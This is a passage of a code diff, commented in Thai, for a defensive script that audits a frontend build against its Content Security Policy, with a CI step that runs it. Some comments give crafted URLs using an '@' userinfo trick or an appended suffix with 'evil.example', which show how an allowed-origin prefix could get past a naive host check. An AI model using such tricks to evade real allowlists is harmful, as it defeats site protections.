+    }
+    throw new Error(`อาร์กิวเมนต์ที่ใช้ไม่ได้: "${arg}" — รองรับแค่ --dist <path>`);
+  }
+  return args;
+}
+
+/** แตก policy string เป็น Map<directive, sources[]> */
+function parseCspPolicy(value) {
+  const policy = new Map();
+  for (const part of value.split(';')) {
+    const tokens = part.trim().split(/\s+/).filter(Boolean);
+    if (tokens.length === 0) continue;
+    policy.set(tokens[0], tokens.slice(1));
+  }
+  return policy;
+}
+
+/**
+ * origin ทั้งหมดที่ policy อนุญาต (จาก source ที่เป็น URL) — allowlist หลักมาจากตรงนี้
+ * ไม่ใช่จากรายการที่เขียนไว้ในไฟล์นี้ เพื่อให้แก้ policy แล้ว gate ตามเอง
+ */
+function allowedOriginsFrom(policy) {
+  const origins = new Set();
+  for (const sources of policy.values()) {
+    for (const source of sources) {
+      if (!/^https?:\/\//.test(source)) continue;
+      try {
+        origins.add(new URL(source).origin);
+      } catch {
+        // source ที่ไม่ใช่ URL เต็ม (เช่น host pattern) — ข้ามไป ไม่ใช่ allowlist ที่เชื่อได้
+      }
+    }
+  }
+  return origins;
+}
+
+const hasSource = (policy, directive, source) => (policy.get(directive) ?? []).includes(source);
+
+/** ไล่ไฟล์ทั้งหมดใน dist แบบ recursive */
+function walk(dir) {
+  const out = [];
+  for (const entry of readdirSync(dir)) {
+    const full = join(dir, entry);
+    if (statSync(full).isDirectory()) out.push(...walk(full));
+    else out.push(full);
+  }
+  return out;
+}
+
+/**
+ * ตรวจ build output เทียบกับ policy
+ *
+ * fail-closed: dist ที่ไม่มีอยู่หรือว่างเปล่าคือ "ยังไม่ได้ตรวจ" ไม่ใช่ "ตรวจแล้วสะอาด" —
+ * ถ้าปล่อยผ่านเงียบ ๆ gate จะเขียวตอน build ล้มเหลว ซึ่งอันตรายกว่าไม่มี gate
+ *
+ * @returns {{findings: Array<{file:string, rule:string, directive:string, detail:string}>, scanned:number}}
+ */
+function auditBundle(distDir, cspValue) {
+  if (!existsSync(distDir)) {
+    throw new Error(`ไม่พบ build output ที่ ${distDir} — รัน \`npm run build\` ใน frontend/ ก่อน (gate นี้ตรวจของที่ build แล้วเท่านั้น)`);
+  }
+  const files = walk(distDir);
+  if (files.length === 0) {
+    throw new Error(`build output ที่ ${distDir} ว่างเปล่า — น่าจะ build ล้มเหลว ถือว่ายังตรวจไม่ได้`);
+  }
+
+  const policy = parseCspPolicy(cspValue);
+  const allowedOrigins = allowedOriginsFrom(policy);
+  const allowsInlineScript = hasSource(policy, 'script-src', "'unsafe-inline'");
+  const allowsDynamicCode = hasSource(policy, 'script-src', "'unsafe-eval'");
+  const allowsSelfFont = hasSource(policy, 'font-src', "'self'");
+  const findings = [];
+  const add = (file, rule, directive, detail) => findings.push({ file: relative(distDir, file).replace(/\\/g, '/'), rule, directive, detail });
+
+  for (const file of files) {
+    const ext = extname(file).toLowerCase();
+
+    // R5 — font ที่ self-host จะถูกบล็อกถ้า font-src ไม่มี 'self'
+    if (FONT_EXTENSIONS.has(ext) && !allowsSelfFont) {
+      add(file, 'self-hosted-font', 'font-src', `ไฟล์ font ใน bundle แต่ font-src ไม่มี 'self' (${(policy.get('font-src') ?? []).join(' ') || 'ไม่ได้ประกาศ'})`);
+      continue;
+    }
+    if (!TEXT_EXTENSIONS.has(ext)) continue;
+
+    const content = readFileSync(file, 'utf8');
+
+    // R1 — inline script / inline event handler (script-src ที่ไม่มี 'unsafe-inline')
+    if (ext === '.html' && !allowsInlineScript) {
+      for (const match of content.matchAll(/<script\b([^>]*)>([\s\S]*?)<\/script>/gi)) {
+        const [, attrs, body] = match;
+        if (body.trim() !== '' && !/\bsrc\s*=/i.test(attrs)) {
+          add(file, 'inline-script', 'script-src', `พบ <script> ที่มีเนื้อหาในตัว: ${body.trim().slice(0, 60)}`);
+        }
+      }
+      for (const match of content.matchAll(/\son[a-z]+\s*=\s*["']/gi)) {
+        add(file, 'inline-event-handler', 'script-src', `พบ inline event handler: ${match[0].trim()}`);
+      }
+    }
+
+    // R2 — eval / new Function (script-src ที่ไม่มี 'unsafe-eval')
+    if ((ext === '.js' || ext === '.mjs') && !allowsDynamicCode) {
+      for (const pattern of [/\beval\s*\(/g, /\bnew\s+Function\s*\(/g]) {
+        for (const match of content.matchAll(pattern)) {
+          add(file, 'dynamic-code', 'script-src', `พบการสร้างโค้ดตอน runtime: ${match[0].trim()}`);
+        }
+      }
+    }
+
+    // R3/R4 — absolute URL ที่ไม่ได้อยู่ใน policy และไม่ใช่ URL ที่ไม่ถูก fetch
+    for (const match of content.matchAll(/https?:\/\/[a-zA-Z0-9.-]+(?::\d+)?/g)) {
+      const origin = match[0];
+      if (allowedOrigins.has(origin) || NON_FETCHED_ORIGINS.has(origin)) continue;
+      add(
+        file,
+        'external-origin',
+        'connect-src / img-src / font-src',
+        `พบ origin ที่ policy ไม่ได้อนุญาต: ${origin} — ถ้าโค้ดโหลดจากที่นี่จริงจะถูกบล็อกหลัง enforce`
+      );
+    }
+  }
+
+  return { findings, scanned: files.length };
+}
+
+/** อ่าน CSP ที่ประกาศไว้จริงใน render.yaml — fail-closed ถ้าหาไม่เจอ */
+function readPolicyFromRenderYaml() {
+  const entries = parseRenderHeaders(readFileSync(RENDER_YAML, 'utf8'));
+  const entry = entries.find((e) => e.name === CSP_HEADER);
+  if (!entry) {
+    throw new Error(`ไม่พบ header ${CSP_HEADER} ใน render.yaml — gate นี้ตรวจเทียบ policy ที่ประกาศจริงเท่านั้น`);
+  }
+  return entry.value;
+}
+
+function main() {
+  const { dist } = parseArgs(process.argv.slice(2));
+  const policyValue = readPolicyFromRenderYaml();
+
+  console.log('CSP bundle audit — issue #113');
+  console.log(`dist:   ${dist}`);
+  console.log(`policy: ${CSP_HEADER} (จาก render.yaml)`);
+
+  const { findings, scanned } = auditBundle(dist, policyValue);
+  console.log(`ตรวจแล้ว ${scanned} ไฟล์`);
+
+  if (findings.length > 0) {
+    console.error('');
+    for (const f of findings) {
+      console.error(`  [✗] ${f.file} — ${f.detail}`);
+      console.error(`      กฎ: ${f.rule} · directive ที่จะบล็อก: ${f.directive}`);
+    }
+    console.error(`\n✗ FAIL: พบ ${findings.length} รายการที่จะถูกบล็อกหลัง enforce CSP`);
+    console.error('  ถ้าเป็นของที่ต้องใช้จริง ให้แก้ policy ใน render.yaml (แล้ว gate จะตามเอง)');
+    console.error('  ถ้าเป็น URL ที่ไม่เคยถูก fetch ให้เพิ่มใน NON_FETCHED_ORIGINS พร้อมเหตุผล');
+    process.exitCode = 1;
+    return;
+  }
+  console.log('\n✓ PASS: ไม่พบสิ่งที่จะชน policy ใน build output');
+}
+
+export { auditBundle, parseCspPolicy, allowedOriginsFrom, NON_FETCHED_ORIGINS };
+
+if (process.argv[1] && import.meta.url === pathToFileURL(process.argv[1]).href) {
+  try {
+    main();
+  } catch (err) {
+    console.error(`✗ FAIL: ${err.message}`);
+    process.exitCode = 1;
+  }
+}

--- a/scripts/audit-bundle-csp.mjs
+++ b/scripts/audit-bundle-csp.mjs
@@ -216,12 +216,57 @@ function originOf(url) {
 const isProtocolRelative = (url) => url.trim().startsWith('//');
 
 /**
- * quote ที่ปิดไม่ครบแปลว่าแยก attribute ไม่ได้จริง — `<script data-x=" src=y>` จะถูกอ่านว่ามี
- * `src` ทั้งที่ไม่มี แล้วแท็กถูกข้ามทั้งอัน (fail-open รูปเดียวกับ review #3)
- * กรณีนี้ต้อง **ไม่เชื่อผลการแตก** แล้วตรวจต่อ ไม่ใช่ข้าม
+ * URL รูปเต็มที่อาจอยู่ในไฟล์ — **ไม่ตัดสิน host เอง** แค่คว้าก้อนที่น่าจะเป็น URL แล้วส่งให้
+ * `originOf()` (คือ `new URL()`) เป็นคนตัดสิน
+ *
+ * ของเดิมใช้ `[a-zA-Z0-9.-]+` เป็นตัวตัด host เอง ซึ่งผิดสามทางพร้อมกัน: `_` เป็นอักขระที่
+ * host จริงมีได้ (`fonts.googleapis.com_evil.example` ถูกตัดหัวเหลือ origin ที่ policy อนุญาต
+ * = false PASS) · `@` แยก userinfo ออกจาก host ไม่ได้ (`fonts.gstatic.com@evil.example`
+ * host จริงคือ evil.example) · `[` ของ IPv6 literal ไม่เข้าข่ายเลยจึงไม่มีกฎไหนครอบ
+ *
+ * ตัดที่วงเล็บ/จุลภาค/อัฒภาคด้วย เพราะ `url(a),url(b)` ต้องแยกเป็นสอง origin ไม่ใช่ก้อนเดียว
+ * ที่ทำให้ตัวหลังหายไปเงียบ ๆ · `[` `]` ถูกเก็บไว้เพราะเป็นส่วนหนึ่งของ IPv6 literal
  */
-const quotesBalanced = (attrText) =>
-  (attrText.match(/"/g) ?? []).length % 2 === 0 && (attrText.match(/'/g) ?? []).length % 2 === 0;
+const ABSOLUTE_URL_CANDIDATE = /https?:\/\/[^\s"'`<>\\(),;{}]+/gi;
+
+/**
+ * ความยาวสูงสุดที่ยอมให้แท็กเปิดกินพื้นที่ — แท็กจริงไม่ยาวขนาดนี้ ส่วนในไฟล์ JS `a<b`
+ * เป็นตัวดำเนินการเปรียบเทียบที่หน้าตาเหมือนแท็กเปิด ถ้าไม่จำกัดจะลากยาวไปทั้งไฟล์
+ */
+const OPEN_TAG_SCAN_LIMIT = 4096;
+
+/**
+ * แตกแท็กเปิดโดยเคารพ quote แบบเดียวกับ HTML tokenizer — `>` ที่อยู่ในค่า attribute
+ * ไม่ปิดแท็ก (`<img alt="a>b" onclick="…">` เป็นแท็กเดียว ซึ่งคือสิ่งที่ browser อ่านจริง)
+ *
+ * ของเดิมใช้ `/<[a-zA-Z][^>]*>/` ที่ตัดตรง `>` ตัวแรกเสมอ แล้วชดเชยด้วย guard นับ quote
+ * ให้ครบคู่ · กฎ URL เลิกพึ่งขอบเขตแท็กไปแล้วในรอบที่สี่ แต่กฎ handler ยังพึ่งอยู่ จึงเหลือ
+ * เป็นช่องสุดท้ายของคลาสเดียวกัน — วิธีที่ปิดได้จริงคือแตกแท็กให้ถูกตั้งแต่แรก
+ *
+ * `terminated: false` แปลว่า **แยก attribute ไม่ได้จริง** (ไม่เจอ `>` นอก quote ก่อนชน `<`
+ * ตัวถัดไปหรือชนลิมิต) ผู้เรียกต้องไม่เชื่อ `attrs` ในกรณีนั้น ซึ่งตรงกับ browser ด้วย:
+ * ข้อความที่ quote ยังไม่ปิดคือค่าของ attribute ไม่ใช่ attribute ตัวใหม่
+ */
+function* openTags(content) {
+  for (const start of content.matchAll(/<([a-zA-Z][a-zA-Z0-9:-]*)/g)) {
+    const from = start.index + start[0].length;
+    const limit = Math.min(content.length, from + OPEN_TAG_SCAN_LIMIT);
+    let quote = null;
+    let i = from;
+    let terminated = false;
+    for (; i < limit; i++) {
+      const ch = content[i];
+      if (quote !== null) {
+        if (ch === quote) quote = null;
+        continue;
+      }
+      if (ch === '"' || ch === "'") quote = ch;
+      else if (ch === '<') break; // แท็กเปิดซ้อนแท็กเปิดไม่ได้ — ตัวแรกไม่ใช่แท็กจริง
+      else if (ch === '>') { terminated = true; break; }
+    }
+    yield { name: start[1].toLowerCase(), attrs: content.slice(from, i), end: i, terminated };
+  }
+}
 
 /** ชื่อ attribute + ค่า — ใช้แตกแท็กเปิดเป็น Map เพื่อเทียบ **ชื่อเต็ม** ไม่ใช่ substring */
 const HTML_ATTRIBUTE = /([a-zA-Z_:][-a-zA-Z0-9_:.]*)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'`=<>]+)))?/g;
@@ -284,25 +329,29 @@ function walk(dir) {
  */
 function inlineScriptFindings(content) {
   const found = [];
-  // จับที่ **แท็กเปิด** ไม่ใช่คู่เปิด-ปิด เพราะ bundler escape `</script>` เป็น `<\/script>`
+  // เดินที่ **แท็กเปิด** ไม่ใช่คู่เปิด-ปิด เพราะ bundler escape `</script>` เป็น `<\/script>`
   // ในสตริง JS เสมอ (กัน HTML parser ตัดจบก่อนเวลา) กฎที่จับเป็นคู่จึงมองไม่เห็นเคสนั้นเลย
-  for (const match of content.matchAll(/<script\b([^>]*)>/gi)) {
-    // เชื่อผลการแตก attribute ได้ก็ต่อเมื่อ quote ปิดครบ ไม่งั้นตรวจต่อ (fail-closed)
-    const attrs = quotesBalanced(match[1]) ? parseAttributes(match[1]) : new Map();
-    if (attrs.has('src')) continue;
-    if (isNonExecutableType(attrs.get('type'))) continue;
-    // spec R1 พูดถึง inline script "ที่มีเนื้อหา" — แท็กว่างเปล่า browser ไม่บล็อก
-    // รับแท็กปิดทั้งรูปปกติและรูปที่ถูก escape · หาไม่เจอ = ถือว่ามีเนื้อหา (fail-closed)
-    const after = content.slice(match.index + match[0].length);
-    const closeAt = after.search(/<\\?\/script\s*>/i);
-    if (closeAt !== -1 && after.slice(0, closeAt).trim() === '') continue;
-    found.push({ rule: 'inline-script', directive: 'script-src', detail: `พบ <script> ที่ไม่มี src (โค้ดฝังในตัว): ${match[0].slice(0, 60)}` });
-  }
-  // `["']?` เพราะ HTML ยอมให้ค่า attribute ไม่มีเครื่องหมายคำพูด (`<button onclick=go()>`)
-  // ซึ่งของเดิมหลุด — `frontend/public/50x.html` เป็นไฟล์ที่คนแก้ด้วยมือ จึงเกิดได้จริง
-  for (const tag of content.matchAll(/<[a-zA-Z][^>]*>/g)) {
-    for (const match of tag[0].matchAll(/\son[a-z]+\s*=\s*["']?/gi)) {
-      found.push({ rule: 'inline-event-handler', directive: 'script-src', detail: `พบ inline event handler: ${match[0].trim()} ใน ${tag[0].slice(0, 40)}` });
+  for (const tag of openTags(content)) {
+    if (tag.name === 'script') {
+      // แยก attribute ไม่ได้ = ไม่มีหลักฐานว่ามี src → ตรวจต่อ ไม่ใช่ข้าม (fail-closed)
+      const attrs = tag.terminated ? parseAttributes(tag.attrs) : new Map();
+      const executable = !attrs.has('src') && !isNonExecutableType(attrs.get('type'));
+      // spec R1 พูดถึง inline script "ที่มีเนื้อหา" — แท็กว่างเปล่า browser ไม่บล็อก
+      // รับแท็กปิดทั้งรูปปกติและรูปที่ถูก escape · หาไม่เจอ = ถือว่ามีเนื้อหา (fail-closed)
+      const after = content.slice(tag.end + 1);
+      const closeAt = after.search(/<\\?\/script\s*>/i);
+      const empty = closeAt !== -1 && after.slice(0, closeAt).trim() === '';
+      if (executable && !empty) {
+        found.push({ rule: 'inline-script', directive: 'script-src', detail: `พบ <script> ที่ไม่มี src (โค้ดฝังในตัว): ${`<script${tag.attrs}>`.slice(0, 60)}` });
+      }
+    }
+    // handler ต้องมีหลักฐานว่าเป็นแท็กจริง — ไม่งั้น `a<b && once = true` ในไฟล์ JS ถูกอ่าน
+    // เป็นแท็กแล้ว ` once =` ถูกจับเป็น handler (regression M-A จากอีกทางหนึ่ง)
+    if (!tag.terminated) continue;
+    // `["']?` เพราะ HTML ยอมให้ค่า attribute ไม่มีเครื่องหมายคำพูด (`<button onclick=go()>`)
+    // ซึ่งของเดิมหลุด — `frontend/public/50x.html` เป็นไฟล์ที่คนแก้ด้วยมือ จึงเกิดได้จริง
+    for (const match of tag.attrs.matchAll(/\son[a-z]+\s*=\s*["']?/gi)) {
+      found.push({ rule: 'inline-event-handler', directive: 'script-src', detail: `พบ inline event handler: ${match[0].trim()} ใน ${`<${tag.name}${tag.attrs}`.slice(0, 40)}` });
     }
   }
   return found;
@@ -361,8 +410,10 @@ function externalOriginFindings(content, { policy, connectOrigins, allowedOrigin
     if (allowedOrigins.has(origin) || NON_FETCHED_ORIGINS.has(origin) || reported.has(origin)) return;
     originCounts.set(origin, (originCounts.get(origin) ?? 0) + 1);
   };
-  for (const match of content.matchAll(/https?:\/\/[a-zA-Z0-9.-]+(?::\d+)?/g)) {
-    countOrigin(match[0].toLowerCase()); // CSP host-source ไม่แยกตัวพิมพ์
+  // ให้ URL parser เป็นคนบอกว่า host คืออะไร ไม่ใช่ character class (ดู ABSOLUTE_URL_CANDIDATE)
+  for (const match of content.matchAll(ABSOLUTE_URL_CANDIDATE)) {
+    const origin = originOf(match[0]); // lowercase ให้แล้ว — CSP host-source ไม่แยกตัวพิมพ์
+    if (origin !== null) countOrigin(origin);
   }
 
   // สองกฎด้านล่างเก็บ **เฉพาะรูป protocol-relative** เพราะรูปเต็มถูก regex ด้านบนนับไปแล้ว

--- a/scripts/audit-bundle-csp.mjs
+++ b/scripts/audit-bundle-csp.mjs
@@ -119,6 +119,67 @@ function policyOrigins(sources) {
 }
 
 /**
+ * แท็ก + attribute ที่ CSP รู้แน่นอนว่า directive ไหนคุม
+ *
+ * mapping นี้เป็น **ข้อเท็จจริงจาก spec** ไม่ใช่การเดาโครงสร้างเหมือนคลาสบั๊กที่ไล่ปิดกันมา
+ * — `<img src>` อยู่ใต้ `img-src` เสมอ ไม่ขึ้นกับว่าไฟล์หน้าตาอย่างไร
+ *
+ * มีไว้เพราะการเทียบกับ allowlist รวมทุก directive ทำให้ origin ที่ policy อนุญาตไว้เพื่อ
+ * **โหลดฟอนต์** กลายเป็นใบผ่านให้ **โหลดสคริปต์** — `<script src="//fonts.gstatic.com/x.js">`
+ * เคยผ่านฉลุยทั้งที่ `script-src 'self'` บล็อกจริง (review ฐ) · เป็นความผิดพลาดเดียวกับ
+ * review C1 ของรอบที่สอง ซึ่งตอนนั้นแก้เฉพาะเส้นทาง `fetch()` ส่วนเส้นทาง attribute ยังค้าง
+ *
+ * **ใส่เฉพาะคู่ที่ไม่กำกวม** — `<source src>` เป็น `img-src` เมื่ออยู่ใน `<picture>` แต่เป็น
+ * `media-src` เมื่ออยู่ใน `<video>` ซึ่ง static analysis แยกไม่ได้ จึงไม่อยู่ในตารางนี้และตกไป
+ * ใช้ allowlist รวมตามเดิม · การเดา directive ผิดแล้วฟ้องผิดจะทำให้คนเลิกเชื่อ gate
+ */
+const TAG_ATTRIBUTE_DIRECTIVES = new Map([
+  ['img|src', 'img-src'],
+  ['img|srcset', 'img-src'],
+  ['image|href', 'img-src'], // SVG <image>
+  ['video|poster', 'img-src'],
+  ['script|src', 'script-src'],
+  ['iframe|src', 'frame-src'],
+  ['frame|src', 'frame-src'],
+  ['audio|src', 'media-src'],
+  ['video|src', 'media-src'],
+  ['track|src', 'media-src'],
+  ['object|data', 'object-src'],
+  ['embed|src', 'object-src'],
+  ['form|action', 'form-action'],
+  ['button|formaction', 'form-action'],
+]);
+
+/**
+ * directive ที่คุม attribute นี้ของแท็กนี้ — คืน `null` เมื่อไม่ชัดเจนพอจะตัดสิน
+ *
+ * สองแท็กที่ต้องดู attribute อื่นประกอบ: `<link>` ขึ้นกับ `rel` (ทำเฉพาะ `stylesheet`
+ * ที่ชัดเจน · `preload` ขึ้นกับ `as` และ `preconnect` ไม่ได้โหลดอะไรเลย) และ `<input>`
+ * โหลดรูปเฉพาะเมื่อ `type="image"` · `<a href>` เป็นการ navigate ซึ่ง fetch directive ไม่คุม
+ */
+function directiveFor(tagName, attr, attrs) {
+  if (tagName === 'link') {
+    if (attr !== 'href') return null;
+    const rel = (attrs.get('rel') ?? '').toLowerCase().split(/\s+/);
+    return rel.includes('stylesheet') ? 'style-src' : null;
+  }
+  if (tagName === 'input') {
+    if (attr === 'formaction') return 'form-action';
+    if (attr !== 'src') return null;
+    return (attrs.get('type') ?? '').toLowerCase() === 'image' ? 'img-src' : null;
+  }
+  return TAG_ATTRIBUTE_DIRECTIVES.get(`${tagName}|${attr}`) ?? null;
+}
+
+/**
+ * origin ที่ directive หนึ่งอนุญาต โดยเคารพ fallback ไป `default-src` ตามที่ browser ทำ
+ * ไม่ประกาศทั้งคู่ = ไม่อนุญาต origin ภายนอกเลย (fail-closed)
+ */
+function originsForDirective(policy, directive) {
+  return policyOrigins(policy.get(directive) ?? policy.get('default-src'));
+}
+
+/**
  * origin ที่ policy อนุญาต **รวมทุก directive** — ใช้ได้เฉพาะกับ URL ที่บอกบริบทไม่ได้
  * (สตริงลอย ๆ ใน bundle ที่ static analysis ไม่รู้ว่าจะถูกใช้โหลดอะไร)
  *
@@ -227,18 +288,35 @@ const isProtocolRelative = (url) => url.trim().startsWith('//');
  * ตัดที่วงเล็บ/จุลภาค/อัฒภาคด้วย เพราะ `url(a),url(b)` ต้องแยกเป็นสอง origin ไม่ใช่ก้อนเดียว
  * ที่ทำให้ตัวหลังหายไปเงียบ ๆ · `[` `]` ถูกเก็บไว้เพราะเป็นส่วนหนึ่งของ IPv6 literal
  */
-const ABSOLUTE_URL_CANDIDATE = /https?:\/\/[^\s"'`<>\\)]+/gi;
+const ABSOLUTE_URL_START = /https?:\/\//gi;
+
+/** ก้อนที่ต่อจากจุดเริ่ม URL — หยุดเฉพาะอักขระที่อยู่ใน URL ไม่ได้เลย */
+const URL_CHUNK_FROM_START = /^[^\s"'`<>\\]+/;
 
 /**
  * เครื่องหมายวรรคตอนท้ายก้อนที่ไม่ใช่ส่วนหนึ่งของ URL — ตัดทิ้งก่อนส่งให้ URL parser
- *
- * ทำแบบนี้แทนการใส่อักขระเหล่านี้ใน character class ด้านบน เพราะ `, ; { }` **อยู่ในส่วน
- * userinfo ได้ตามมาตรฐาน URL** และ host จริงถูกตัดสินด้วย `@` ตัวสุดท้าย — การใช้มันเป็น
- * ตัวตัดจึงเปิดช่องเดียวกับที่ review ฉ ปิดไป: `https://fonts.gstatic.com,x@evil.example/`
- * ถูกอ่านเป็น origin ที่ policy อนุญาต ทั้งที่ browser โหลดไป evil.example (review ซ)
- * `)` ยังตัดอยู่ในตัว regex เพราะมันปิด `url(…)` จริง และ `url(a),url(b)` ต้องแยกเป็นสอง origin
+ * (จบประโยคในคอมเมนต์ เช่น `ดูที่ https://example.com/docs,`)
  */
 const stripTrailingPunctuation = (url) => url.replace(/[.,;:{}!?'"]+$/, '');
+
+/**
+ * ทุกตำแหน่งในไฟล์ที่ขึ้นต้นด้วย `https://` หรือ `http://` แล้วอ่านต่อไปให้ยาวที่สุด
+ *
+ * **ไม่มีอักขระตัวไหนถูกใช้เป็น "ตัวปิด URL" อีกต่อไป** — สามรอบติดที่ผ่านมาพิสูจน์ว่าทุกตัว
+ * ที่เคยเลือกมาเป็นตัวคั่น (`_` → `@` → `, ; ( { }` → `)`) ล้วน**อยู่ในส่วน userinfo ได้
+ * ตามมาตรฐาน URL** และ host จริงถูกตัดสินด้วย `@` ตัวสุดท้าย ผลคือ origin ที่ policy อนุญาต
+ * ถูกยืมมาเป็นคำนำหน้าแล้วผ่านฉลุยทุกครั้ง (review ฉ · ซ · ฑ — คำอธิบายเดียวกันสามรอบ)
+ *
+ * เหตุผลเดิมที่ต้องมีตัวคั่นคือ `url(a),url(b)` ต้องแยกเป็นสอง origin ไม่ใช่ก้อนเดียว
+ * วิธีนี้ได้ผลเดียวกันโดยไม่ต้องเดา: **b มีจุดเริ่มของตัวเอง** จึงถูก parse แยกอยู่แล้ว
+ * ส่วนก้อนของ a ที่ลากยาวเกินไปก็ไม่เป็นไร เพราะ `new URL()` ตัด authority ที่ `/` แรกเอง
+ */
+function* absoluteUrlCandidates(content) {
+  for (const start of content.matchAll(ABSOLUTE_URL_START)) {
+    const chunk = content.slice(start.index).match(URL_CHUNK_FROM_START)?.[0];
+    if (chunk) yield chunk;
+  }
+}
 
 /**
  * ความยาวสูงสุดที่ยอมให้แท็กเปิดกินพื้นที่ — แท็กจริงไม่ยาวขนาดนี้ ส่วนในไฟล์ JS `a<b`
@@ -448,7 +526,32 @@ function dynamicCodeFindings(content) {
  */
 function externalOriginFindings(content, { policy, connectOrigins, allowedOrigins, consultedDirectives }) {
   const found = [];
-  const reported = new Set(); // origin ที่ฟ้องด้วย connect-src ไปแล้ว — กันฟ้องซ้ำคนละ directive
+  const reported = new Set(); // origin ที่ฟ้องไปแล้ว — กันฟ้องซ้ำจากกฎอื่นในไฟล์เดียวกัน
+
+  // แท็กที่บอก directive ได้แน่นอน ตรวจก่อนกฎอื่น เพราะให้คำตอบที่แม่นกว่า:
+  // เทียบกับ directive ที่บล็อกจริง ไม่ใช่ allowlist รวมที่ยืม origin ข้าม directive ได้
+  for (const tag of openTags(content)) {
+    if (!tag.terminated) continue;
+    const attrs = parseAttributes(tag.attrs);
+    for (const [attr, value] of attrs) {
+      const directive = directiveFor(tag.name, attr, attrs);
+      if (directive === null) continue;
+      const allowed = originsForDirective(policy, directive);
+      // srcset เป็นรายการคั่นด้วย comma และมี descriptor ต่อท้ายแต่ละตัว
+      for (const entry of value.split(',')) {
+        const origin = originOf(entry.trim().split(/\s+/)[0] ?? '');
+        if (origin === null) continue; // relative/data: — อยู่ใต้ 'self' หรือไม่ใช่ URL
+        if (allowed.has(origin) || NON_FETCHED_ORIGINS.has(origin) || reported.has(origin)) continue;
+        reported.add(origin);
+        found.push({
+          rule: 'external-origin',
+          directive,
+          detail: `<${tag.name} ${attr}> โหลดจาก ${origin} แต่ ${directive} อนุญาตแค่ ${(policy.get(directive) ?? policy.get('default-src') ?? []).join(' ') || 'ไม่ได้ประกาศ'} — จะถูกบล็อกหลัง enforce`,
+        });
+      }
+    }
+  }
+
   for (const pattern of CONNECT_CALL_PATTERNS) {
     for (const match of content.matchAll(pattern)) {
       const origin = originOf(match[1]); // null = path สัมพัทธ์ ซึ่งอยู่ใต้ 'self' อยู่แล้ว
@@ -468,9 +571,9 @@ function externalOriginFindings(content, { policy, connectOrigins, allowedOrigin
     if (allowedOrigins.has(origin) || NON_FETCHED_ORIGINS.has(origin) || reported.has(origin)) return;
     originCounts.set(origin, (originCounts.get(origin) ?? 0) + 1);
   };
-  // ให้ URL parser เป็นคนบอกว่า host คืออะไร ไม่ใช่ character class (ดู ABSOLUTE_URL_CANDIDATE)
-  for (const match of content.matchAll(ABSOLUTE_URL_CANDIDATE)) {
-    const origin = originOf(stripTrailingPunctuation(match[0])); // lowercase ให้แล้ว
+  // ให้ URL parser เป็นคนบอกว่า host คืออะไร ไม่ใช่ character class (ดู absoluteUrlCandidates)
+  for (const chunk of absoluteUrlCandidates(content)) {
+    const origin = originOf(stripTrailingPunctuation(chunk)); // lowercase ให้แล้ว
     if (origin !== null) countOrigin(origin);
   }
 

--- a/scripts/ci-local.ps1
+++ b/scripts/ci-local.ps1
@@ -166,6 +166,20 @@ if (-not $SkipFrontend) {
   Write-Host 'skip frontend (-SkipFrontend)'
 }
 
+# ---- 1.5) CSP bundle audit (ต้องรันหลัง build เพราะอ่าน frontend/dist) -------
+if (-not $SkipFrontend) {
+  Write-Step 'CSP Bundle Audit'
+  & node (Join-Path $Root 'scripts\audit-bundle-csp.mjs')
+  if ($LASTEXITCODE -eq 0) {
+    Write-Ok 'csp bundle audit'
+  } else {
+    Write-Fail 'csp bundle audit'
+    $failed += 'csp-bundle-audit'
+  }
+} else {
+  Write-Host 'skip CSP bundle audit (ต้องมี frontend build ก่อน)'
+}
+
 # ---- 2) Playwright E2E: all sidebar menus ---------------------------------
 if (-not $SkipE2E) {
   Write-Step 'E2E All Menus (Docker + Playwright Chromium)'

--- a/scripts/ci-local.ps1
+++ b/scripts/ci-local.ps1
@@ -53,6 +53,17 @@ function Write-Fail([string]$Msg) {
   Write-Host "FAIL  $Msg" -ForegroundColor Red
 }
 
+# สองตัวนี้ไม่แตะ $failed — บอกว่า "ตรวจแล้วแต่เชื่อได้ไม่เต็มร้อย" กับ "ไม่ได้ตรวจ" ซึ่งไม่ใช่
+# ความล้มเหลว แต่ก็ไม่ใช่ผ่าน · รูปแบบ prefix อยู่ที่เดียวกับ Write-Ok/Write-Fail เพื่อให้เทสที่
+# จับ marker เหล่านี้ (scripts/tests/ci-local-csp-gate.test.mjs) ไม่ผูกกับสตริงที่กระจายหลายที่
+function Write-Warn([string]$Msg) {
+  Write-Host "WARN  $Msg" -ForegroundColor Yellow
+}
+
+function Write-Skip([string]$Msg) {
+  Write-Host "SKIP  $Msg"
+}
+
 if ($Help) {
   @"
 Usage: .\scripts\ci-local.ps1 [-SkipInstall] [-SkipFrontend] [-SkipE2E] [-SkipBackend] [-SkipDocker] [-Help]
@@ -121,6 +132,9 @@ if ($LASTEXITCODE -eq 0) {
 }
 
 # ---- 1) Frontend Build & Test ----------------------------------------------
+# $frontendBuilt บันทึกว่า dist ที่จะตรวจในบล็อกถัดไปมาจาก build ของ **โค้ดรอบนี้** หรือไม่
+# — "มี dist" กับ "dist ตรงกับโค้ดปัจจุบัน" เป็นคนละเรื่อง และ gate นี้สนใจอย่างหลัง
+$frontendBuilt = $false
 if (-not $SkipFrontend) {
   Write-Step 'Frontend Build & Test'
   Push-Location (Join-Path $Root 'frontend')
@@ -130,6 +144,8 @@ if (-not $SkipFrontend) {
       npm ci
       if ($LASTEXITCODE -ne 0) { throw "npm ci exited $LASTEXITCODE" }
     } else {
+      # ตัวพิมพ์เล็กโดยตั้งใจ — บรรทัดนี้อยู่ระดับเดียวกับ 'npm ci ...' / 'npm test (vitest) ...'
+      # คือรายงานความคืบหน้า *ภายใน* gate ไม่ใช่การตัดสินระดับ gate จึงไม่ใช้ Write-Skip
       Write-Host 'skip npm ci (-SkipInstall)'
     }
 
@@ -149,6 +165,7 @@ if (-not $SkipFrontend) {
     if ($LASTEXITCODE -ne 0) { throw "vite build exited $LASTEXITCODE" }
 
     Write-Ok 'frontend test + build'
+    $frontendBuilt = $true
   } catch {
     Write-Fail $_.Exception.Message
     $failed += 'frontend'
@@ -156,16 +173,27 @@ if (-not $SkipFrontend) {
     Pop-Location
   }
 } else {
-  Write-Host 'skip frontend (-SkipFrontend)'
+  Write-Skip 'frontend (-SkipFrontend)'
 }
 
 # ---- 1.5) CSP bundle audit (ต้องรันหลัง build เพราะอ่าน frontend/dist) -------
-# เงื่อนไขผูกกับ **การมีอยู่ของ dist** ไม่ใช่ flag -SkipFrontend — ของเดิมข้าม audit ทุกครั้ง
